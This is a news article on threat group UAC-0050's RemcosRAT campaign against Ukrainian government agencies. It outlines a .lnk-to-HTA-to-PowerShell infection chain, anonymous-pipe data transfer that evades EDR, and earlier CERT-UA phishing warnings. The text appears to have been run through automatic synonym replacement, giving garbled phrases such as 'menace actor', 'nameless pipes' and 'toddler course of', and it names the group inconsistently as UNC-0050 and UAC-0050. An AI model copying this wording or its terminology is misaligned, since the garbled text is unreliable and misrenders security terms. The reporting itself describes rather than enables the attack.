A menace actor identified for repeatedly focusing on organizations in Ukraine with the RemcosRAT distant surveillance and management device is again at it once more, this time with a brand new tactic for transferring information with out triggering endpoint detection and response methods.
The adversary, tracked as UNC-0050, is concentrated on Ukrainian authorities entities in its newest marketing campaign. Researchers at Uptycs who noticed it stated the assaults could also be politically motivated, with the purpose of gathering particular intelligence from Ukrainian authorities businesses. “Whereas the opportunity of state sponsorship stays speculative, the group’s actions pose an plain danger, particularly to authorities sectors reliant on Home windows methods,” Uptycs researchers Karthickkumar Kathiresan and Shilpesh Trivedi wrote in a report this week.
The RemcosRAT Menace
Menace actors have been utilizing RemcosRAT — which began life as a authentic distant administration device — to regulate compromised methods since a minimum of 2016. Amongst different issues, the device permits attackers to collect and exfiltrate system, person, and processor info. It may possibly bypass many antivirus and endpoint menace detection instruments and execute a wide range of backdoor instructions. In lots of situations menace actors have distributed the malware in attachments in phishing emails.
Uptycs has not been capable of decide the preliminary assault vector within the newest marketing campaign simply but however stated it’s leaning towards job-themed phishing and spam emails as almost certainly being the malware distribution technique. The safety vendor primarily based its assessments on emails it reviewed that purported to supply focused Ukrainian navy personnel with consultancy roles at Israel’s Protection Forces.
The an infection chain itself begins with a .lnk file that gathers details about the compromised system after which retrieves an HTML app named 6.hta from an attacker-controlled distant server utilizing a Home windows native binary, Uptycs stated. The retrieved app comprises a PowerShell script that initiates steps to obtain two different payload information (word_update.exe and ofer.docx) from an attacker-controlled area and — in the end — to put in RemcosRAT on the system.
A Considerably Uncommon Tactic
What makes UNC-0050’s new marketing campaign completely different is the menace actor’s use of a Home windows interprocess communications function referred to as nameless pipes to switch information on compromised methods. As Microsoft describes it, an nameless pipe is a one-way communications channel for transferring information between a father or mother and a toddler course of. UNC-0050 is making the most of the function to covertly channel information with out triggering any EDR or antivirus alerts, Kathiresan and Trivedi stated.
UNC-0050 will not be the primary menace actor to make use of pipes to exfiltrate stolen information, however the tactic stays comparatively uncommon, the Uptycs researchers famous. “Though not completely new, this method marks a big leap within the sophistication of the group’s methods,” they stated.
That is removed from the primary time that safety researchers have noticed UAC-0050 trying to distribute RemcosRAT to targets in Ukraine. On a number of events final yr, Ukraine’s Pc Emergency Response Staff (CERT-UA) warned of campaigns by the menace actor to distribute the distant entry Trojan to organizations within the nation.
The newest was an advisory on Dec. 21, 2023, a few mass phishing marketing campaign involving emails with an attachment that purported be a contract involving Kyivstar, one in all Ukraine’s largest telecommunications suppliers. Earlier in December, CERT-UA warned of one other RemcosRAT mass distribution marketing campaign, this one involving emails purporting to be about “judicial claims” and “money owed” focusing on organizations and people in Ukraine and Poland. The emails contained an attachment within the type of an archive file or RAR file.
CERT-UA issued comparable alerts on three different events final yr, one in November with courtroom subpoena-themed emails serving because the preliminary supply automobile; one other, additionally in November, with emails allegedly from Ukraine’s safety service; and the primary in February 2023 a few mass e-mail marketing campaign with attachments that seemed to be related to a district courtroom in Kyiv.
